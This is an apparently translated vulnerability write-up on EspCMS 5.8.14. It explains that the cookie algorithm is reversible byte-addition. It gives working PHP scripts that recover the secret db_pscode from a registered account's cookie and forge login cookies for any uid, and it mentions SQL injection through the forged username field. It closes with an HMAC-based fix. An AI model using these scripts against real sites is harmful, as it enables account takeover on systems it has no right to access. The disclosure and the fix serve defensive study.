The latest EspCMS version allows forging a login to any account (simple use of code)

Source: Internet
Author: User

The latest EspCMS version allows forging a login to any account (source code analysis)
Affected version: Espcms_utf8_5.8.14.03.03_ B

db_pscode is a central part of the user cookie generation algorithm in EspCMS.

It seems several experts have reported this before, and the vendor only made minor changes, so the problem was never actually fixed.

Here, an ordinary account can be registered and db_pscode recovered from the account name together with its cookie.

First, the cookie encryption algorithm, /public/class_function.php, lines 144-170:

```php
function eccode($string, $operation = 'DECODE', $key = '@LFK24s224%@safS3s%1f%', $mcrype = true) {
    $result = null;
    if ($operation == 'ENCODE') {
        // Add each plaintext byte to a key byte; there is no one-way step anywhere
        for ($i = 0; $i < strlen($string); $i++) {
            $char = substr($string, $i, 1);
            // Index is ($i % strlen($key)) - 1, so position 0 uses the key's last byte
            $keychar = substr($key, ($i % strlen($key)) - 1, 1);
            $char = chr(ord($char) + ord($keychar));
            $result .= $char;
        }
        $result = base64_encode($result);
        // URL-safe base64 variant without padding
        $result = str_replace(array('+', '/', '='), array('-', '_', ''), $result);
    } elseif ($operation == 'DECODE') {
        $data = str_replace(array('-', '_'), array('+', '/'), $string);
        $mod4 = strlen($data) % 4;
        if ($mod4) {
            $data .= substr('====', $mod4);
        }
        $string = base64_decode($data);
        // Subtract the same key bytes to recover the plaintext
        for ($i = 0; $i < strlen($string); $i++) {
            $char = substr($string, $i, 1);
            $keychar = substr($key, ($i % strlen($key)) - 1, 1);
            $char = chr(ord($char) - ord($keychar));
            $result .= $char;
        }
    }
    return $result;
}
```

I am not sure my analysis is entirely correct, but the root cause is that no one-way function is used anywhere, so db_pscode can be recovered by reversing the encoding.

As an example, the db_pscode on my local installation is 81cc52c15f9f1df62679efdb12de1be.

First, register an account and obtain its cookie (screenshot not reproduced here).
I wrote a simple script to recover db_pscode:

```php
<?php
// Known-plaintext recovery of db_pscode: the ecisp_member_username cookie is
// eccode(username, 'ENCODE', db_pscode), so subtracting the known username
// bytes from the decoded cookie bytes leaves the key bytes.
$string   = "lmlilJRmY5RiZpdql2KV";   // ecisp_member_username cookie of the test account
$username = "111111111111111";        // the registered username (15 characters)
$result   = "";

// Undo the URL-safe substitution and restore the stripped base64 padding
$string = str_replace(array('-', '_'), array('+', '/'), $string);
$mod4 = strlen($string) % 4;
if ($mod4) {
    $string .= substr('====', $mod4);
}
$de_string = base64_decode($string);

// Byte 0 was encoded with the key's last byte; bytes 1.. use key[0], key[1], ...
// so decoded[i] - username[i] gives key[i-1]. Stop at the decoded length rather
// than reading one byte past the end of the string.
for ($i = 1; $i < strlen($de_string); $i++) {
    $result .= chr(ord($de_string[$i]) - ord($username[$i]));
}
echo "code=" . $result;
?>
```

Running this script yields db_pscode (output screenshot not reproduced here).

The recovered db_pscode is incomplete here because the registered username is not long enough. Registering a sufficiently long username produces a sufficiently long cookie, from which the complete db_pscode can be recovered.

Once db_pscode is known, only two cookies need to be forged, ecisp_member_username and ecisp_member_info, and any account can be logged into.

I also wrote a simple script for computing these cookies.

```php
<?php
// Computes a cookie value exactly as eccode($username, 'ENCODE', $string) would.
$string = "81cc52c15f9f1d";   // recovered db_pscode (the full value once a long enough username was used)
// To compute ecisp_member_username, put the username here directly.
// To compute ecisp_member_info, use the format 2|0|1| where the first number is the uid.
$username = "2|0|1|";
$result = "";
for ($i = 0; $i < strlen($username); $i++) {
    // Same index rule as eccode(): position 0 uses the key's last byte
    $keychar = substr($string, ($i % strlen($string)) - 1, 1);
    $char = chr(ord($keychar) + ord($username[$i]));
    $result .= $char;
}
$result = base64_encode($result);
$result = str_replace(array('+', '/', '='), array('-', '_', ''), $result);
echo $result;
?>
```

Note: the username constructed here does not need to match the uid, because when reading the cookie the program only checks whether the uid exists. The username can therefore be anything, as long as the uid exists.

For example, to log in to the account with userid = 1, the ecisp_member_info cookie is computed as lrStk99mrt-tsQ.

The other value can be computed from an arbitrary string; it does not matter if that username does not exist.

Modify the cookies accordingly (screenshot not reproduced here).
Then access /index.php?ac=membermain&at=center directly: the login succeeds.

In addition, because the username in the cookie can be constructed at will, an injection can be placed in the username field...

Multiple places turn out to be injectable this way, completely bypassing gpc and the global filtering.

Solution:

The algorithm itself is the fundamental problem: a reversible byte-addition transform is not a MAC, so anyone who learns db_pscode (or recovers it from one known cookie) can mint cookies for any uid.
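As an added example of the fix (this is not EspCMS code; the function names and the secret constant are assumptions), a cookie authenticated with an HMAC instead of the reversible eccode() transform: the uid travels in clear but cannot be altered or forged without the server secret, and the username no longer enters the cookie at all, which also closes the injection path described above.

```php
<?php
// Added example, not EspCMS code. COOKIE_SECRET is an assumption: in practice it
// is a random 32+ byte value loaded from server-side config and never sent to clients.
define('COOKIE_SECRET', 'replace-with-random-32-byte-secret');

// Build a login cookie value: uid|expiry|hmac. Only the numeric uid and an
// expiry go in; there is no hidden plaintext to recover because nothing is hidden.
function makeAuthCookie(string $uid, int $ttlSeconds = 3600): string {
    $expires = time() + $ttlSeconds;
    $data = $uid . '|' . $expires;
    $mac = hash_hmac('sha256', $data, COOKIE_SECRET);
    return $data . '|' . $mac;
}

// Verify a cookie and return the uid, or null if it is malformed, expired or
// tampered. hash_equals() keeps the MAC comparison constant-time.
function verifyAuthCookie(string $cookie): ?string {
    $parts = explode('|', $cookie);
    if (count($parts) !== 3) {
        return null;
    }
    [$uid, $expires, $mac] = $parts;
    // Strict numeric checks: no attacker-chosen username or SQL fragment can
    // ever reach a query through this cookie.
    if (!ctype_digit($uid) || !ctype_digit($expires)) {
        return null;
    }
    if ((int)$expires < time()) {
        return null;
    }
    $expected = hash_hmac('sha256', $uid . '|' . $expires, COOKIE_SECRET);
    return hash_equals($expected, $mac) ? $uid : null;
}

// Demonstration: a genuine cookie for uid 2, then the same cookie with the uid
// changed to 1 while keeping the old MAC (the kind of edit that works against eccode()).
$good   = makeAuthCookie('2');
$forged = '1' . substr($good, 1);
var_dump(verifyAuthCookie($good));    // genuine cookie
var_dump(verifyAuthCookie($forged));  // tampered uid, old MAC
?>
```

When setting the cookie, pass the HttpOnly and Secure flags to setcookie() so the value is not readable from scripts or sent over plain HTTP.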
